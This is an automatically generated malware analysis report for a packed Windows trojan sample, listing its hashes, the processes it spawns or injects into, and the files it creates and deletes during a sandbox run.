Trojan.Generic.14779156_71cc6609b8

by malwarelabrobot on August 29th, 2015 in Malware Descriptions.

Trojan.Generic.14779156 (AdAware), Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 71cc6609b8db5735ef1d0cf991f0ee49
SHA1: 6abe7b6d599d0ef84c7225808129b166b64efa7a
SHA256: 393c69d06b1edf1fd89dfc4eda3cf7ac22fff35d015a64c10de58b36ca5023a2
SSDeep: 24576:g8pVgU6qc00PhieAdO7gejjdYKmui3Omj:rVgUo00PQlMHdYvR
Size: 816064 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-12-06 00:50:52
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

WMIC.exe:3044
vchk.exe:456
taskkill.exe:2712
taskkill.exe:3924
taskkill.exe:3712
taskkill.exe:1612
taskkill.exe:760
taskkill.exe:3288
taskkill.exe:2968
taskkill.exe:2524
taskkill.exe:1948
taskkill.exe:2520
taskkill.exe:2324
taskkill.exe:1940
taskkill.exe:2328
taskkill.exe:2248
taskkill.exe:2400
taskkill.exe:2292
taskkill.exe:3996
taskkill.exe:2844
taskkill.exe:2408
taskkill.exe:3760
taskkill.exe:3488
taskkill.exe:3836
taskkill.exe:3764
taskkill.exe:2708
taskkill.exe:3832
taskkill.exe:2852
taskkill.exe:1152
taskkill.exe:3400
taskkill.exe:1496
taskkill.exe:264
taskkill.exe:3408
taskkill.exe:3644
taskkill.exe:2996
taskkill.exe:3244
taskkill.exe:4080
taskkill.exe:2412
taskkill.exe:3844
taskkill.exe:412
taskkill.exe:2792
taskkill.exe:2148
taskkill.exe:3948
taskkill.exe:2476
taskkill.exe:1324
taskkill.exe:3820
taskkill.exe:3276
taskkill.exe:1924
taskkill.exe:3308
taskkill.exe:2600
taskkill.exe:3208
taskkill.exe:3676
taskkill.exe:4044
taskkill.exe:2308
taskkill.exe:4040
taskkill.exe:2780
taskkill.exe:1852
taskkill.exe:2304
taskkill.exe:3388
taskkill.exe:3008
taskkill.exe:2380
taskkill.exe:2664
taskkill.exe:2660
taskkill.exe:1652
taskkill.exe:2260
taskkill.exe:3744
taskkill.exe:2200
taskkill.exe:3584
taskkill.exe:3556
taskkill.exe:2280
taskkill.exe:2448
taskkill.exe:304
taskkill.exe:3508
taskkill.exe:4056
taskkill.exe:2044
taskkill.exe:2576
taskkill.exe:3468
taskkill.exe:2376
taskkill.exe:432
taskkill.exe:2484
taskkill.exe:2616
taskkill.exe:2596
taskkill.exe:2920
taskkill.exe:336
taskkill.exe:1228
taskkill.exe:2192
taskkill.exe:3000
taskkill.exe:3168
taskkill.exe:172
taskkill.exe:3452
taskkill.exe:484
taskkill.exe:2056
taskkill.exe:2564
taskkill.exe:3012
taskkill.exe:2368
taskkill.exe:3892
taskkill.exe:2680
taskkill.exe:3080
taskkill.exe:2116
taskkill.exe:3600
taskkill.exe:2812
taskkill.exe:3876
taskkill.exe:3524
taskkill.exe:3076
taskkill.exe:2184
taskkill.exe:220
taskkill.exe:2216
taskkill.exe:3200
taskkill.exe:2896
taskkill.exe:2892
taskkill.exe:3500
taskkill.exe:3964
taskkill.exe:2108
taskkill.exe:2692
taskkill.exe:2104
taskkill.exe:2860
taskkill.exe:3868
taskkill.exe:3900
taskkill.exe:3636
taskkill.exe:2636
taskkill.exe:3632
taskkill.exe:2436
taskkill.exe:3060
taskkill.exe:236
taskkill.exe:4008
taskkill.exe:2340
taskkill.exe:1616
taskkill.exe:3432
taskkill.exe:4004
taskkill.exe:3928
taskkill.exe:2744
taskkill.exe:1560
taskkill.exe:2748
taskkill.exe:2504
taskkill.exe:1564
taskkill.exe:3624
taskkill.exe:2728
taskkill.exe:3356
taskkill.exe:3932
taskkill.exe:3228
taskkill.exe:2336
taskkill.exe:3116
taskkill.exe:3788
taskkill.exe:3548
taskkill.exe:2084
taskkill.exe:2224
taskkill.exe:1764
%original file name%.exe:348

The Trojan injects its code into the following process(es):

winonit.exe:892
EG9650tGGrxO3Ey:1932
getcap.exe:1236
wincheckfe.exe:1676
wcheckf.exe:660
vchk.exe:232
internetport3.exe:1088

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process winonit.exe:892 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\a\avv.txt (2432 bytes)
C:\a\ahho.txt (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvA.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IYXZ7PKS\hho[1].htm (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvA.tmp\KillProcDLL.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvA.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HQR7BMVW\uur[1].htm (2 bytes)
C:\a\auur.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ML3M60RP\vv[1].htm (2432 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsv9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvA.tmp (0 bytes)
C:\a\vv.txt (0 bytes)
C:\a\uur.txt (0 bytes)
C:\a\hho.txt (0 bytes)

The process EG9650tGGrxO3Ey:1932 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HQR7BMVW\localhost[1].htm (716 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc13.tmp\nsExec.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\EG9650tGGrxO3Eyr78zW.html (716 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc13.tmp\inetc.dll (20 bytes)
C:\a\1loogg2.txt (170 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc13.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\apEG9650tGGrxO3Eyr78zW.html (324 bytes)
C:\a\1logff.txt (718 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ML3M60RP\ckkk[1].htm (303 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc13.tmp\ns29.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8MWF95DD\ckkkp[1].htm (324 bytes)
C:\a\vv11111.txt (26514 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\aEG9650tGGrxO3Eyr78zW.html (303 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsc13.tmp (0 bytes)
C:\a\ProcessList.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\apEG9650tGGrxO3Eyr78zW.html (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\EG9650tGGrxO3Eyr78zW.html (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc13.tmp\ns29.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp (0 bytes)
C:\a\vv11111.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\aEG9650tGGrxO3Eyr78zW.html (0 bytes)

The process getcap.exe:1236 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\a\7za.exe (15192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswE.tmp\System.dll (11 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nswD.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswE.tmp (0 bytes)

The process WMIC.exe:3044 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\FastInternet\TempWmicBatchFile.bat (0 bytes)
C:\a\ProcessList.txt (1888 bytes)

The Trojan deletes the following file(s):

C:\a\ProcessList.txt (0 bytes)

The process wincheckfe.exe:1676 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nse6.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse6.tmp\FindProcDLL.dll (3 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nse5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse6.tmp (0 bytes)

The process wcheckf.exe:660 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\yuntnani\vchk.exe (3808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp8.tmp\FindProcDLL.dll (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp8.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IYXZ7PKS\vchk[1].exe (3808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp8.tmp\inetc.dll (20 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsp7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp8.tmp (0 bytes)

The process vchk.exe:232 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsAC.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns6F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsB3.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsB6.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns74.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsA8.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns95.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns8F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsAA.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns40.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsA2.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsA5.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsAF.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns6B.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns34.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns21.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns2C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsA1.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns5D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns5A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns7F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns78.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns83.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns54.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns51.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns91.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns46.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns7E.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns8E.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns2B.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns67.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsA3.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns82.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns88.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns35.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns7A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns6A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns3E.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns4C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns4A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns58.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns76.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns38.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns2D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns33.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns60.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns3A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns52.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsB1.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns75.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsA0.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns26.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsA9.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns43.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns9B.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns99.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns5F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsB0.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns2A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsAB.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns1B.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns31.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns20.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns5C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns1A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsAD.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsB5.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns8C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns66.tmp (6 bytes)
C:\a\avchk.txt (1885 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns9C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns36.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns41.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns32.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns96.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns93.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns49.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns28.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns6E.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsA6.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns2E.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns1C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns84.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns3B.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns86.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns11.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns50.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns16.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns68.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns9E.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns97.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns81.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns59.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns53.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns45.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns8A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns25.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns48.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns2F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns15.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns85.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns42.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns3F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns3D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns98.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns70.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns1E.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns39.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns73.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsAE.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns30.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsB4.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns18.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns27.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns9D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns79.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns9A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns6D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns37.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns69.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns71.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns94.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsA7.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns7C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns8B.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns63.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns44.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns7D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns23.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8MWF95DD\vchk[1].htm (1885 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns1F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns8D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns3C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsExec.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns87.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns47.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns4E.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns7B.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns12.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns14.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsB2.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns24.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns90.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns62.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns92.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns72.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns56.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns77.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns65.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns17.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns55.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns80.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns4D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns89.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsB7.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns4F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns9F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsA4.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns6C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns19.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns57.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns5E.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns61.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns64.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns1D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns22.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns5B.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns4B.tmp (6 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsAC.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns6F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsB3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsB6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns74.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsA8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns95.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns8F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsAA.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns40.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsA2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsA5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsAF.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns6B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns34.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns21.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns2C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsA1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns5D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns5A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns7F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns78.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns83.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns54.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns51.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns91.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns46.tmp (0 bytes)
C:\a\vchk.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns7E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns8E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns2B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns67.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\nsA3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr10.tmp\ns82.tmp (0 bytes)
